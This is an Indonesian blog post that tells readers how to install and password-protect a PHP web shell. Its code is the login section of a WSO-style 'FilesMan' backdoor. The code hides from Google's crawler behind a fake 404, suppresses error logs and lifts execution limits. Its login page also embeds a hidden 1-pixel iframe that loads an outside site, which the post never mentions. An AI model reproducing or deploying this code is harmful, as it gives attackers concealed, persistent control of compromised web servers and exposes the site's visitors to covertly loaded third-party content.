silahkan Copy Script Di bawah ke notepad .. ingat taruh Script nya setelah <?php
<?phpBagian Script yang Tulisannya bold bisa diganti sesuka kalian ... untuk Password .. jika mau diganti edit "12345abc" dan "185aef3b1c810799a6be8314abf6512c"
/* (ngurahrayana.tk | default pass:" 12345abc ") */
$auth_pass = "185aef3b1c810799a6be8314abf6512c";
$color = "#00ff00";
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);
if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
header('HTTP/1.0 404 Not Found');
exit;
}
@session_start();
@error_reporting(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('html_errors',0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
@ini_set('display_errors', 0);
@ini_set('file_uploads',1);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@clearstatcache();
@define('VERSION', '2.1');
if( get_magic_quotes_gpc() ) {
function stripslashes_array($array) {
return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
}
$_POST = stripslashes_array($_POST);
}
function printLogin() {
?><body><style>
body { background-color:transparan;background:#000;background-image: url("http://www.mbwallpapers.com/file/3855/600x338/16:9/msi-dragon-flame-on-logo-wallpaper_1541753052.jpg");background-position: center; background-attachment: fixed;background-repeat: no-repeat; }
.tabnez{ margin:30px auto 0 auto;border: 1px solid #333333; color: #00ff00;
-moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;}
body,td,th {font-family: Verdana;font-size: 12px;color: #00FF00;font-weight: bold;}
input {BORDER-RIGHT:#00FF00 1px solid;BORDER-TOP:#00FF00 1px solid;BORDER-LEFT:#00FF00 1px solid;BORDER-BOTTOM: #00FF00 1px solid;BACKGROUND-COLOR: #111111;COLOR: #00FF00;font: 8pt Verdana;}
</style>
<center><br><br><table class=tabnez>
<form method=post><tr><td><img src='http://www.xbitlabs.com/images/mainboards/msi-z77a-gd65-gaming/lable.png' height='20' width='24'></td><td>
<input type=password name=pass></td></tr>
</form></table></center>
<iframe style="height:1px" src="http://www.Brenz.pl/rc/" frameborder=0 width=1></iframe>
</body>
<?php
exit;
}
if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
if( empty( $auth_pass ) ||
( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
else
printLogin();
"12345abc" = password yg anda inginkan ...untuk demo bisa ke SINI
"185aef3b1c810799a6be8314abf6512c" = Hasil MD5 dari password yg anda inginkan .. untuk mengubah ke MD5 bisa ke DISINI
Semoga Bermanfaat :)
1. Yahoo
2. Tutorialseoblogspot
3. Blog Dofollow
4. Ilmu Belajar Komputer
5. Download Smadav Terbaru
6. Daftarpaypal.wordpress.com
7. Health Information
8. Mentari.biz
9. Blogdofollowindonesia
10. Rayana Tech
Post a Comment